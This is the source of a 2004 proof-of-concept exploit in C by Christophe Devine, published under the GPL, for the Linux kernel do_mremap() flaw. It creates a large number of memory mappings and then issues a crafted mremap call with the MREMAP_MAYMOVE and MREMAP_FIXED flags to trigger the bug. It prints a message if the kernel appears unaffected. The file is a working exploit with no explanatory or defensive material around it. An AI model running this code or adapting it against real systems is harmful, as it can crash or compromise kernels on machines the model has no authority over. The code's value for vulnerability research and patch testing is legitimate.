Proof-of-concept exploit code for do_mremap()
/*
* Proof-of-concept exploit code for do_mremap() #2
*
* Copyright (C) 2004 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>
#define MREMAP_MAYMOVE 1
#define MREMAP_FIXED 2
#define MREMAP_FLAGS MREMAP_MAYMOVE | MREMAP_FIXED
#define __NR_real_mremap __NR_mremap
static inline _syscall5( void *, real_mremap, void *, old_address,
size_t, old_size, size_t, new_size,
unsigned long, flags, void *, new_address );
#define VMA_SIZE 0x00003000
int main( void )
{
int i, ret;
void *base0;
void *base1;
i = 0;
while( 1 )
{
i++;
ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),
VMA_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );
if( ret == -1 )
{
perror( "mmap" );
break;
}
base0 = base1;
base1 = (void *) ret;
}
printf( "created ~%d VMAs\n", i );
base0 += 0x1000;
base1 += 0x1000;
printf( "now mremapping 0x%08X at 0x%08X\n",
(int) base1, (int) base0 );
real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );
printf( "kernel may not be vulnerable\n" );
return( 0 );
}